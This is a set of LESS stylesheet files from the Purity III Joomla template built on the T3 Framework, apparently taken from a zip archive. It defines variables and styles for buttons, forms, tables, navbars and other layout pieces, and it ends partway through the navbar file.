@caret-width-large:              5px;


// Tables
// -------------------------
@table-cell-padding:                 8px;
@table-condensed-cell-padding:       5px;

@table-bg:                           transparent; // overall background-color
@table-bg-accent:                    #f9f9f9; // for striping
@table-bg-hover:                     #f5f5f5;
@table-bg-active:                    @table-bg-hover;

@table-border-color:                 #ddd; // table and cell border


// Buttons
// -------------------------

@btn-font-weight:                normal;

@btn-default-color:              #333;
@btn-default-bg:                 #fff;
@btn-default-border:             #ccc;

@btn-primary-color:              #fff;
@btn-primary-bg:                 @brand-primary;
@btn-primary-border:             darken(@btn-primary-bg, 5%);

@btn-success-color:              #fff;
@btn-success-bg:                 @brand-success;
@btn-success-border:             darken(@btn-success-bg, 5%);

@btn-warning-color:              #fff;
@btn-warning-bg:                 @brand-warning;
@btn-warning-border:             darken(@btn-warning-bg, 5%);

@btn-danger-color:               #fff;
@btn-danger-bg:                  @brand-danger;
@btn-danger-border:              darken(@btn-danger-bg, 5%);

@btn-info-color:                 #fff;
@btn-info-bg:                    @brand-info;
@btn-info-border:                darken(@btn-info-bg, 5%);

// T3 Note: Add "Inverse" style for Button
@btn-inverse-color:              #fff;
@btn-inverse-bg:                 @gray-dark;
@btn-inverse-border:             darken(@btn-inverse-bg, 5%);

@btn-link-disabled-color:        @gray-light;


// Forms
// -------------------------

@input-bg:                       #fff;
@input-bg-disabled:              @gray-lighter;

@input-color:                    @gray;
@input-border:                   #ccc;
@input-border-radius:            @border-radius-base;
@input-border-focus:             #66afe9;

@input-color-placeholder:        @gray-light;

@input-height-base:              (@line-height-computed + (@padding-base-vertical * 2) + 2);
@input-height-large:             (floor(@font-size-large * @line-height-large) + (@padding-large-vertical * 2) + 2);
@input-height-small:             (floor(@font-size-small * @line-height-small) + (@padding-small-vertical * 2) + 2);

@legend-color:                   @gray-dark;
@legend-border-color:            #e5e5e5;

@input-group-addon-bg:           @gray-lighter;
@input-group-addon-border-color: @input-border;


// Dropdowns
// -------------------------

@dropdown-bg:                    @gray-dark;
@dropdown-border:                @gray-dark;
@dropdown-fallback-border:       @gray-dark;
@dropdown-divider-bg:            lighten(@dropdown-bg,5%);

@dropdown-link-color:            @gray-light;
@dropdown-link-hover-color:      #fff;
@dropdown-link-hover-bg:         lighten(@dropdown-bg,5%);

@dropdown-link-active-color:     #fff;
@dropdown-link-active-bg:        darken(@dropdown-bg,5%);

@dropdown-link-disabled-color:   @gray-light;

@dropdown-header-color:          @gray-light;

@dropdown-caret-color:           @dropdown-link-color;


// COMPONENT VARIABLES
// --------------------------------------------------


// Z-index master list
// -------------------------
// Used for a bird's eye view of components dependent on the z-axis
// Try to avoid customizing these :)

@zindex-navbar:            1000;
@zindex-dropdown:          1000;
@zindex-popover:           1010;
@zindex-tooltip:           1030;
@zindex-navbar-fixed:      1030;
@zindex-modal-background:  1040;
@zindex-modal:             1050;

// Media queries breakpoints
// --------------------------------------------------

// Extra small screen / phone
// Note: Deprecated @screen-xs and @screen-phone as of v3.0.1
@screen-xs:                  480px;
@screen-xs-min:              @screen-xs;
@screen-phone:               @screen-xs-min;

// Small screen / tablet
// Note: Deprecated @screen-sm and @screen-tablet as of v3.0.1
@screen-sm:                  768px;
@screen-sm-min:              @screen-sm;
@screen-tablet:              @screen-sm-min;

// Medium screen / desktop
// Note: Deprecated @screen-md and @screen-desktop as of v3.0.1
@screen-md:                  992px;
@screen-md-min:              @screen-md;
@screen-desktop:             @screen-md-min;

// Large screen / wide desktop
// Note: Deprecated @screen-lg and @screen-lg-desktop as of v3.0.1
@screen-lg:                  1200px;
@screen-lg-min:              @screen-lg;
@screen-lg-desktop:          @screen-lg-min;

// So media queries don't overlap when required, provide a maximum
@screen-xs-max:              (@screen-sm-min - 1);
@screen-sm-max:              (@screen-md-min - 1);
@screen-md-max:              (@screen-lg-min - 1);


// Grid system
// --------------------------------------------------

// Number of columns in the grid system
@grid-columns:              12;
// Padding, to be divided by two and applied to the left and right of all columns
@grid-gutter-width:         40px;
// Point at which the navbar stops collapsing
@grid-float-breakpoint:     @screen-sm-max;


// Navbar
// -------------------------

// Basics of a navbar
@navbar-height:                    55px;
@navbar-margin-bottom:             @line-height-computed;
@navbar-border-radius:             @border-radius-base;
@navbar-padding-horizontal:        floor(@grid-gutter-width / 2);
@navbar-padding-vertical:          ((@navbar-height - @line-height-computed) / 2);

@navbar-default-color:             lighten(@navbar-default-bg,50%);
@navbar-default-bg:                @brand-primary;
@navbar-default-border:            darken(@navbar-default-bg,5%);

// Navbar links
@navbar-default-link-color:                lighten(@navbar-default-bg,50%);
@navbar-default-link-hover-color:          #fff;
@navbar-default-link-hover-bg:             transparent;
@navbar-default-link-active-color:         #fff;
@navbar-default-link-active-bg:            transparent;
@navbar-default-link-disabled-color:       #ccc;
@navbar-default-link-disabled-bg:          transparent;

// Navbar brand label
@navbar-default-brand-color:               @navbar-default-link-color;
@navbar-default-brand-hover-color:         darken(@navbar-default-brand-color, 10%);
@navbar-default-brand-hover-bg:            transparent;

// Navbar toggle
@navbar-default-toggle-hover-bg:           @navbar-default-bg;
@navbar-default-toggle-icon-bar-bg:        #fff;
@navbar-default-toggle-border-color:       @navbar-default-bg;


// Inverted navbar
//
// Reset inverted navbar basics
@navbar-inverse-color:                      @gray-light;
@navbar-inverse-bg:                         #222;
@navbar-inverse-border:                     darken(@navbar-inverse-bg, 10%);

// Inverted navbar links
@navbar-inverse-link-color:                 @gray-light;
@navbar-inverse-link-hover-color:           #fff;
@navbar-inverse-link-hover-bg:              transparent;
@navbar-inverse-link-active-color:          @navbar-inverse-link-hover-color;
@navbar-inverse-link-active-bg:             darken(@navbar-inverse-bg, 10%);
@navbar-inverse-link-disabled-color:        #444;
@navbar-inverse-link-disabled-bg:           transparent;

// Inverted navbar brand label
@navbar-inverse-brand-color:                @navbar-inverse-link-color;
@navbar-inverse-brand-hover-color:          #fff;
@navbar-inverse-brand-hover-bg:             transparent;

// Inverted navbar toggle
@navbar-inverse-toggle-hover-bg:            #333;
@navbar-inverse-toggle-icon-bar-bg:         #fff;
@navbar-inverse-toggle-border-color:        #333;


// Navs
// -------------------------

@nav-link-padding:                          10px 15px;
@nav-link-hover-bg:                         @gray-lighter;

@nav-disabled-link-color:                   @gray-light;
@nav-disabled-link-hover-color:             @gray-light;

@nav-open-link-hover-color:                 #fff;
@nav-open-caret-border-color:               #fff;

// Tabs
@nav-tabs-border-color:                     #ddd;

@nav-tabs-link-hover-border-color:          @gray-lighter;

@nav-tabs-active-link-hover-bg:             @body-bg;
@nav-tabs-active-link-hover-color:          @gray;
@nav-tabs-active-link-hover-border-color:   #ddd;

@nav-tabs-justified-link-border-color:            #ddd;
@nav-tabs-justified-active-link-border-color:     @body-bg;

// Pills
@nav-pills-border-radius:                   @border-radius-base;
@nav-pills-active-link-hover-bg:            @component-active-bg;
@nav-pills-active-link-hover-color:         @component-active-color;


// Pagination
// -------------------------

@pagination-bg:                        #fff;
@pagination-border:                    #ddd;

@pagination-hover-bg:                  @gray-lighter;

@pagination-active-bg:                 @brand-primary;
@pagination-active-color:              #fff;

@pagination-disabled-color:            @gray-light;


// Pager
// -------------------------

@pager-border-radius:                  15px;
@pager-disabled-color:                 @gray-light;


// Jumbotron
// -------------------------

@jumbotron-padding:              40px;
@jumbotron-color:                inherit;
@jumbotron-bg:                   @gray-lighter;
@jumbotron-heading-color:        inherit;
@jumbotron-font-size:            ceil(@font-size-base * 1.5);


// Form states and alerts
// -------------------------

@state-success-text:             #468847;
@state-success-bg:               #dff0d8;
@state-success-border:           darken(spin(@state-success-bg, -10), 5%);

@state-info-text:                #3a87ad;
@state-info-bg:                  #d9edf7;
@state-info-border:              darken(spin(@state-info-bg, -10), 7%);

@state-warning-text:             #c09853;
@state-warning-bg:               #fcf8e3;
@state-warning-border:           darken(spin(@state-warning-bg, -10), 5%);

@state-danger-text:              #b94a48;
@state-danger-bg:                #f2dede;
@state-danger-border:            darken(spin(@state-danger-bg, -10), 5%);


// Tooltips
// -------------------------
@tooltip-max-width:           350px;	/* joomla 3.x 400px */
@tooltip-color:               #fff;
@tooltip-bg:                  #000;

@tooltip-arrow-width:         5px;
@tooltip-arrow-color:         @tooltip-bg;


// Popovers
// -------------------------
@popover-bg:                          #fff;
@popover-max-width:                   276px;
@popover-border-color:                rgba(0,0,0,.2);
@popover-fallback-border-color:       #ccc;

@popover-title-bg:                    darken(@popover-bg, 3%);

@popover-arrow-width:                 10px;
@popover-arrow-color:                 #fff;

@popover-arrow-outer-width:           (@popover-arrow-width + 1);
@popover-arrow-outer-color:           rgba(0,0,0,.25);
@popover-arrow-outer-fallback-color:  #999;


// Labels
// -------------------------

@label-default-bg:            @gray-light;
@label-primary-bg:            @brand-primary;
@label-success-bg:            @brand-success;
@label-info-bg:               @brand-info;
@label-warning-bg:            @brand-warning;
@label-danger-bg:             @brand-danger;

@label-color:                 #fff;
@label-link-hover-color:      #fff;


// Modals
// -------------------------
@modal-inner-padding:         20px;

@modal-title-padding:         20px;
@modal-title-line-height:     @line-height-base;

@modal-content-bg:                             #fff;
@modal-content-border-color:                   rgba(0,0,0,.2);
@modal-content-fallback-border-color:          #999;

@modal-backdrop-bg:           #000;
@modal-header-border-color:   #e5e5e5;
@modal-footer-border-color:   @modal-header-border-color;


// Alerts
// -------------------------
@alert-padding:               15px;
@alert-border-radius:         @border-radius-base;
@alert-link-font-weight:      bold;

@alert-success-bg:            @state-success-bg;
@alert-success-text:          @state-success-text;
@alert-success-border:        @state-success-border;

@alert-info-bg:               @state-info-bg;
@alert-info-text:             @state-info-text;
@alert-info-border:           @state-info-border;

@alert-warning-bg:            @state-warning-bg;
@alert-warning-text:          @state-warning-text;
@alert-warning-border:        @state-warning-border;

@alert-danger-bg:             @state-danger-bg;
@alert-danger-text:           @state-danger-text;
@alert-danger-border:         @state-danger-border;


// Progress bars
// -------------------------
@progress-bg:                 #f5f5f5;
@progress-bar-color:          #fff;

@progress-bar-bg:             @brand-primary;
@progress-bar-success-bg:     @brand-success;
@progress-bar-warning-bg:     @brand-warning;
@progress-bar-danger-bg:      @brand-danger;
@progress-bar-info-bg:        @brand-info;


// List group
// -------------------------
@list-group-bg:               #fff;
@list-group-border:           #ddd;
@list-group-border-radius:    @border-radius-base;

@list-group-hover-bg:         #f5f5f5;
@list-group-active-color:     @component-active-color;
@list-group-active-bg:        @component-active-bg;
@list-group-active-border:    @list-group-active-bg;

@list-group-link-color:          #555;
@list-group-link-heading-color:  #333;


// Panels
// -------------------------
@panel-bg:                    #fff;
@panel-inner-border:          #ddd;
@panel-border-radius:         @border-radius-base;
@panel-footer-bg:             #f5f5f5;

@panel-default-text:          @gray-dark;
@panel-default-border:        #ddd;
@panel-default-heading-bg:    #f5f5f5;

@panel-primary-text:          #fff;
@panel-primary-border:        @brand-primary;
@panel-primary-heading-bg:    @brand-primary;

@panel-success-text:          @state-success-text;
@panel-success-border:        @state-success-border;
@panel-success-heading-bg:    @state-success-bg;

@panel-warning-text:          @state-warning-text;
@panel-warning-border:        @state-warning-border;
@panel-warning-heading-bg:    @state-warning-bg;

@panel-danger-text:           @state-danger-text;
@panel-danger-border:         @state-danger-border;
@panel-danger-heading-bg:     @state-danger-bg;

@panel-info-text:             @state-info-text;
@panel-info-border:           @state-info-border;
@panel-info-heading-bg:       @state-info-bg;


// Thumbnails
// -------------------------
@thumbnail-padding:           4px;
@thumbnail-bg:                @body-bg;
@thumbnail-border:            #ddd;
@thumbnail-border-radius:     @border-radius-base;

@thumbnail-caption-color:     @text-color;
@thumbnail-caption-padding:   10px;


// Wells
// -------------------------
@well-bg:                     #f5f5f5;


// Badges
// -------------------------
@badge-color:                 #fff;
@badge-link-hover-color:      #fff;
@badge-bg:                    @gray-light;

@badge-active-color:          @link-color;
@badge-active-bg:             #fff;

@badge-font-weight:           bold;
@badge-line-height:           1;
@badge-border-radius:         @border-radius-base;


// Breadcrumbs
// -------------------------
@breadcrumb-bg:               @gray-lighter;
@breadcrumb-color:            #999;
@breadcrumb-active-color:     @gray-light;
@breadcrumb-separator:        "/";


// Carousel
// ------------------------

@carousel-text-shadow:                        0 1px 2px rgba(0,0,0,.6);

@carousel-control-color:                      #fff;
@carousel-control-width:                      15%;
@carousel-control-opacity:                    .5;
@carousel-control-font-size:                  20px;

@carousel-indicator-active-bg:                #fff;
@carousel-indicator-border-color:             #fff;

@carousel-caption-color:                      #fff;


// Close
// ------------------------
@close-font-weight:           bold;
@close-color:                 #000;
@close-text-shadow:           0 1px 0 #fff;


// Code
// ------------------------
@code-color:                  #c7254e;
@code-bg:                     #f9f2f4;

@pre-bg:                      #f5f5f5;
@pre-color:                   @gray-dark;
@pre-border-color:            #ccc;
@pre-scrollable-max-height:   340px;

// Type
// ------------------------
@text-muted:                  @gray-light;
@abbr-border-color:           @gray-light;
@headings-small-color:        @gray-light;
@blockquote-small-color:      @gray-light;
@blockquote-border-color:     @gray-lighter;
@page-header-border-color:    @gray-lighter;

// Miscellaneous
// -------------------------

// Hr border color
@hr-border:                   @gray-lighter;

// Horizontal forms & lists
@component-offset-horizontal: 180px;


// Container sizes
// --------------------------------------------------

// Small screen / tablet
@container-tablet:             ((720px + @grid-gutter-width));
@container-sm:                 @container-tablet;

// Medium screen / desktop
@container-desktop:            ((940px + @grid-gutter-width));
@container-md:                 @container-desktop;

// Large screen / wide desktop
@container-large-desktop:      ((1140px + @grid-gutter-width));
@container-lg:                 @container-large-desktop;



//
// T3 GLOBAL STYLES
// --------------------------------------------------

// Module Styles
// -------------------------
// Module General
@t3-module-bg:                  transparent;
@t3-module-color:               inherit;
@t3-module-padding:             0;
@t3-module-border:              1px solid #ddd;

// Module Title
@t3-module-title-bg:            @t3-module-bg;      // inherit from @t3-module-bg
@t3-module-title-color:         @t3-module-color;   // inherit from @t3-module-color
@t3-module-title-padding:       @t3-module-padding;

// Module Content
@t3-module-content-bg:          @t3-module-bg;      // inherit from @t3-module-bg
@t3-module-content-color:       @t3-module-color;   // inherit from @t3-module-color
@t3-module-content-padding:     @t3-module-padding;


// Global Margin & Padding
// -------------------------
@t3-global-margin:              @line-height-computed;
@t3-global-padding:             @line-height-computed;


// Typography
// -------------------------
@t3-font-size-big:              @font-size-base + 1px;
@t3-font-size-bigger:           @font-size-base + 2px;

@t3-font-size-small:            @font-size-base - 1px;
@t3-font-size-smaller:          @font-size-base - 2px;



//
// T3 LOGO
// --------------------------------------------------
@t3-logo-image:               "@{t3-image-path}/logo.png";



//
// T3 TEMPLATE STYLES
// --------------------------------------------------
@t3-image-path:                 "../images";
@t3-border-color:               @hr-border;



// Footer Styles
// -------------------------
@t3-footer-background:              @gray-lightest;
@t3-footer-text-color:              @gray;

@t3-footer-module-background:       @t3-footer-background;
@t3-footer-module-text-color:       @t3-footer-text-color;

@t3-footer-module-title-color:      @text-color;



// 
// T3 ADD-ONS
// --------------------------------------------------

// Off-Canvas
// -------------------------

// Off-Canvas Width 
@t3-off-canvas-width:                 250px;

// Off-Canvas Header
@t3-off-canvas-header-background:     @gray-lighter;
@t3-off-canvas-header-text-color:     @text-color;

// Off-Canvas Body
@t3-off-canvas-background:            @body-bg;
@t3-off-canvas-text-color:            @text-color;

@t3-off-canvas-link-color:            @link-color;
@t3-off-canvas-link-hover-color:      @link-hover-color;

@t3-off-canvas-headings-color:        inherit;PKԜ�\Y1�KKpurity_iii/less/core.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// --------------------------------------------------
// CORE ELEMENTS
// --------------------------------------------------

//
// SCAFFOLDING (scaffolding.less)
// --------------------------------------------------

html {
}

body {
  padding-top: @navbar-height;
}

// Reset fonts for relevant elements
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}


// Links
// --------------------------------------------------
a {
  color: @link-color;
  text-decoration: none;
  outline: none;
  .transition(all .2s);

  &:hover,
  &:focus {
    color: @link-hover-color;
    text-decoration: underline;
  }

  &:focus {
    .tab-focus();
  }
}


// Images
// --------------------------------------------------
img {
  vertical-align: middle;
}

// Responsive images (ensure images don't scale beyond their parents)
.img-responsive {
}

// Rounded corners
.img-rounded {
}

// Image thumbnails
.img-thumbnail {
}

// Perfect circle
.img-circle {
}



//
// TABLES (tables.less)
// -------------------------------------------------------
table {
}

// All Cells
// ---------
th,
td {
  line-height: @line-height-base;
  text-align: left;
  vertical-align: top;
} 

// Heading
// -------
th {
  font-weight: bold;
  // Links in Table Heading
  a {
    // Link states
    &:hover, &:focus, &:active {
    }
  }
}

// Base Cells
// ----------
td,
tr td {
  border-top: 1px solid @table-border-color;
}



// Specific Joomla! Table Styles
// -----------------------------
.cat-list-row0,
.cat-list-row1,
tr.cat-list-row0 td,
tr.cat-list-row1 td {
}

.cat-list-row0:hover,
.cat-list-row1:hover {
  background: @table-bg-hover;
}

.cat-list-row1,
tr.cat-list-row1 td {
  background: @table-bg-accent;
}

table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}

table.contentpaneopen {
  border: 0;
}



// 
// MISC
// --------------------------------------------------
.star {
  color: @yellow;
}

.red {
  color: @red;
}

// Horizontal rules
hr {
  margin-top:    @line-height-computed;
  margin-bottom: @line-height-computed;
  border: 0;
  border-top: 1px solid @hr-border;
}

// Wrap Element
.wrap {
  width: auto;
  clear: both;
}

// Center
.center,
.table td.center,
.table th.center {
  text-align: center;
}

// Hidden elements
.element-invisible {
 position: absolute;
 padding: 0;
 margin: 0;
 border: 0;
 height: 1px;
 width: 1px;
 overflow: hidden;
}PKԜ�\|����'�'purity_iii/less/forms.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// ------------------------------------------------------
// FORM ELEMENTS
// ------------------------------------------------------

//
// GENERIC STYLES (forms.less)
// --------------------------------------------------

form {
}

fieldset {
}

legend {
  padding-bottom: @t3-global-padding / 2;
  font-weight: 700;
}

label {
}


// Adjust output element
output {
}


// Common form controls
// --------------------
// Shared size and type resets for form controls. Apply `.form-control` to any
// of the following form controls:
//
// select
// textarea
// input[type="text"]
// input[type="password"]
// input[type="datetime"]
// input[type="datetime-local"]
// input[type="date"]
// input[type="month"]
// input[type="time"]
// input[type="week"]
// input[type="number"]
// input[type="email"]
// input[type="url"]
// input[type="search"]
// input[type="tel"]
// input[type="color"]
.form-control {

  // Customize the `:focus` state to imitate native WebKit styles.
  .form-control-focus();

  // Placeholder
  .placeholder();

  // Disabled and read-only inputs
  &[disabled],
  &[readonly],
  fieldset[disabled] & {
  }

  // Reset height for `textarea`s
  textarea& {
    height: auto;
  }
}


// Form groups
// -----------
.form-group {
  margin-bottom: @t3-global-margin;
}


// Checkboxes and radios
// ---------------------
.radio,
.checkbox {
  label {
    display: inline;
  }
}

.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
}

.radio + .radio,
.checkbox + .checkbox {
}

// Radios and checkboxes on same line
.radio-inline,
.checkbox-inline {
}

.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
}


// Form control sizing
// -------------------
.input-sm {
}

.input-lg {
}


// Form control feedback states
// ----------------------------
// Apply contextual and semantic states to individual form controls.

// Warning
.has-warning {
}
// Error
.has-error {
}
// Success
.has-success {
}


// Static form control text
// ------------------------
// Apply class to a `p` element to make any string of text align with labels in
// a horizontal form layout.

.form-control-static {
  margin-bottom: 0; // Remove default margin from `p`
}


// Help text
// ---------
// Apply to any element you wish to create light text for placement immediately
// below a form control. Use for general help, formatting, or instructional text.

.help-block {
}



// Inline forms
// ------------
// Make forms appear inline(-block) by adding the `.form-inline` class. Inline
// forms begin stacked on extra small (mobile) devices and then go inline when
// viewports reach <768px.
//
// Requires wrapping inputs and labels with `.form-group` for proper display of
// default HTML form controls and our custom form controls (e.g., input groups).
//
// Heads up! This is mixin-ed into `.navbar-form` in navbars.less.

.form-inline {

  @media (min-width: @screen-sm) {

    .form-group  {
      display: inline-block;
    }

    // In navbar-form, allow folks to *not* use `.form-group`
    .form-control {
      display: inline-block;
    }

    // Remove default margin on radios/checkboxes that were used for stacking, and
    // then undo the floating of radios and checkboxes to match (which also avoids
    // a bug in WebKit: https://github.com/twbs/bootstrap/issues/1969).
    .radio,
    .checkbox {
    }

    .radio input[type="radio"],
    .checkbox input[type="checkbox"] {
      float: none;
    }

  }

  // End
}


// Horizontal forms
// ----------------
// Horizontal forms are built on grid classes and allow you to create forms with
// labels on the left and inputs on the right.

.form-horizontal {

  // Consistent vertical alignment of labels, radios, and checkboxes
  .control-label,
  .radio,
  .checkbox,
  .radio-inline,
  .checkbox-inline {
    margin-top: 0;
    margin-bottom: 0;
    padding-top: (@padding-base-vertical + 1); // Default padding plus a border
  }

  // Make form groups behave like rows
  .form-group {
  }

  .form-control-static {
    padding-top: (@padding-base-vertical + 1);
  }

}


//
// INPUT GROUPS (input-groups.less)
// --------------------------------------------------
// T3 Note: See "bootstrap/input-group.less"
//  if you want to style this components



//
// BUTTONS (buttons.less)
// --------------------------------------------------

// Base styles
// --------------------------------------------------

// Core styles
.btn {

  &:focus {
  }

  &:hover,
  &:focus {
  }

  &:active,
  &.active {
  }

  &.disabled,
  &[disabled],
  fieldset[disabled] & {
  }

}


// Alternate buttons
// --------------------------------------------------
.btn-default {
}

.btn-primary {
}

// Warning appears as orange
.btn-warning {
}

// Danger and error appear as red
.btn-danger {
}

// Success appears as green
.btn-success {
}

// Info appears as blue-green
.btn-info {
}

// T3 Note: Inverse appears as dark-grey
.btn-inverse {
  .button-variant(@btn-inverse-color; @btn-inverse-bg; @btn-inverse-border);
}


// Link buttons
// --------------------------------------------------
// Make a button look and behave like a link
.btn-link {

  &,
  &:active,
  &[disabled],
  fieldset[disabled] & {
  }

  &,
  &:hover,
  &:focus,
  &:active {
  }

  &:hover,
  &:focus {
  }

  &[disabled],
  fieldset[disabled] & {
    &:hover,
    &:focus {
    }
  }

}


// Button Sizes
// --------------------------------------------------
.btn-lg {
}

.btn-sm,
.btn-xs {
}

.btn-xs {
}


// Block button
// --------------------------------------------------
.btn-block {
}

// Vertically space out multiple block buttons
.btn-block + .btn-block {
  margin-top: 5px;
}


// CTA button
// --------------------------------------------------
.btn-actions {
  .btn-lg {
    font-size: @font-size-large;
    padding: 10px 20px;
    border-radius: 20px;
  }
  .btn + .btn {
    margin-left: 20px;
  }
  @media screen and (min-width: @screen-sm) {
    .btn-lg {
      font-size: @font-size-h3;
      padding: 10px 30px;
      border-radius: 30px;
    }
  }
}



//
// BUTTON GROUPS (button-groups.less)
// --------------------------------------------------
// T3 Note: See "bootstrap/buttons-group.less"
//  if you want to style this component




// T3 Note: We added legacy form elements to get better
// compatibility with Joomla Core.

// ------------------------------------------------------
// LEGACY FORM ELEMENTS (base-bs3/less/legacy-forms.less)
// ------------------------------------------------------


//
// GENERIC STYLES
// ------------------------------------------------------

// Common form controls
// --------------------

// Legacy class below
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {

  // Focus states
  &:focus {}

  // Placeholder
  .placeholder();

  // Disabled and read-only inputs
  &[disabled],
  &[readonly],
  fieldset[disabled] & {
  }

  // Reset height for `textarea`s
  textarea& {
    height: auto;
  }

  // Reset Width for Legacy classes in Medium Screen
  @media screen and (min-width: @screen-sm) {
    width: auto;
  }

}

// Redefine padding for <select>
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}


// Legacy Input Size
// -------------------
// General classes for quick sizes
.input-mini {
}

.input-small {
}

.input-medium {
}

.input-large {
}

.input-xlarge {
}

.input-xxlarge {
}



// Inline forms
// ------------
.form-inline {
}


// Horizontal forms
// ----------------
.form-horizontal {
}



//
// OTHER LEGACY CLASSES FROM BS2
// ------------------------------------------------------

// FORM ACTIONS
// ------------
// Adding the legacy "form-actions" from BS2
.form-actions {
}


// INPUT GROUPS
// ------------
// Allow us to put symbols and text within the input field for a cleaner look
.input-append,
.input-prepend {

  input,
  select,
  .uneditable-input {
    // Focus state
    &:focus {
    }
  }

  .add-on {
  }

  .active {
    background-color: lighten(@green, 30);
    border-color: @green;
  }

}

.input-prepend {

  .add-on,
  .btn {
  }

  .add-on:first-child,
  .btn:first-child {
  }

}

.input-append {

  input,
  select,
  .uneditable-input {
  }

  .add-on,
  .btn,
  .btn-group {
  }

  .add-on:last-child,
  .btn:last-child,
  .btn-group:last-child > .dropdown-toggle {
  }

}


.input-prepend.input-append {

  input,
  select,
  .uneditable-input {
  }

  .add-on:first-child,
  .btn:first-child {
  }

  .add-on:last-child,
  .btn:last-child {
  }

  .btn-group:first-child {
  }

}



//
// BUTTONS
// ------------------------------------------------------

// Lagacy Button Sizes
// --------------------------------------------------

// Large
.btn-large {
}

.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
}

// Small
.btn-small {
}

.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
}


// Mini
.btn-mini {
}

.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
}




//
// FORM VALIDATION
// -------------------------------------------------------

// Invalid
// -----------------------
.invalid {
  border-color: @red;
}

label.invalid {
  color: @red;
}

input.invalid {
  border: 1px solid @red;
}
PKԜ�\���(]!]!purity_iii/less/navbar.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// -------------------------------------------------------
//  DEFAULT BOOTSTRAP NAVBAR (navbars.less)
// -------------------------------------------------------

// Base Navbars
// --------------------------------------------------
.navbar {
  @media (min-width: @grid-float-breakpoint) {
  }
}


// Navbar heading
// --------------
.navbar-header {
  @media (min-width: @grid-float-breakpoint) {
  }
}


// Navbar collapse (body)
// ----------------------
.navbar-collapse {
  @media (min-width: @grid-float-breakpoint) {
  }
}


// Brand/project name
// ------------------
.navbar-brand {
  // Link states
  &:hover,
  &:focus {
  }
  @media (min-width: @grid-float-breakpoint) {
  }
}


// Navbar toggle
// -------------
.navbar-toggle {
  padding: 0;
  height: @navbar-height;
  line-height: @navbar-height;
  width: @navbar-height;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;

  // States
  &:hover, &:active, &:focus {
    outline: none;
    .box-shadow(none);
  }

  // Bars
  .fa-bars {
  }

  // Hide on breakpoint
  @media (min-width: @grid-float-breakpoint) {
    display: none;
  }
}


// Navbar nav links
// ----------------
.navbar-nav {
  margin: (@navbar-padding-vertical / 2) -@navbar-padding-horizontal;

  > li > a {
  }

  // T3 Note: Dropdown Menu styles when collapsed
  // Dropdowns get custom display when collapsed
  @media (max-width: @screen-xs-max) {
    .open .dropdown-menu {
      > li > a,
      .dropdown-header {
      }
      > li > a {
        // Link states
        &:hover,
        &:focus {
        }
      }
    }
  }

  // T3 Note: Main Styles for breakpoint
  // Uncollapse the nav
  @media (min-width: @grid-float-breakpoint) {
    margin: 0;
    > li {
      > a {
      }
    }
  }

  // End
}


// Navbar form
// ------------
.navbar-form {
}


// Dropdown in navbars
// -------------------
// Menu position and menu carets
.navbar-nav > li > .dropdown-menu {
}


// Buttons in navbars
// ------------------
.navbar-btn {
}


// Text in navbars
// ---------------
.navbar-text {
}



//
// Default Navbars (Visual Style only)
// --------------------------------------------------
.navbar-default {
  background-color: @navbar-default-bg;
  border-color: @navbar-default-border;

  .navbar-text {
    color: @navbar-default-color;
  }

  .navbar-nav {

    > li {
      @media screen and (min-width: @grid-float-breakpoint) {
        margin-left: 30px;
      }
    }

    > li > a,
    > li > span {
      color: @navbar-default-link-color;
      padding: @t3-global-padding;
      text-transform: uppercase;

      @media screen and (min-width: @grid-float-breakpoint) {
        padding: 0;
        line-height: @navbar-height;
      }

      &:hover,
      &:focus {
        color: @navbar-default-link-hover-color;
        background-color: @navbar-default-link-hover-bg;
        @media screen and (min-width: @grid-float-breakpoint) {
          .box-shadow(inset 0 -2px 0 #fff);
        }
      }
    }
    > .active > a,
    > .active > span {
      &,
      &:hover,
      &:focus {
        color: @navbar-default-link-active-color;
        background-color: @navbar-default-link-active-bg;
        @media screen and (min-width: @grid-float-breakpoint) {
          .box-shadow(inset 0 -2px 0 #fff);
        }
      }
    }
  }

  .navbar-toggle {
    border: 0;
    &:hover,
    &:focus {
      background: @navbar-default-border;
      color: @navbar-default-link-hover-color;
    }
    .icon-bar,
    .fa-bars {
      background-color: transparent;
      color: @navbar-default-color;
    }
  }

  .navbar-collapse,
  .navbar-form {
    border-color: @navbar-default-border;
  }

  // Dropdown menu items and carets
  .navbar-nav {
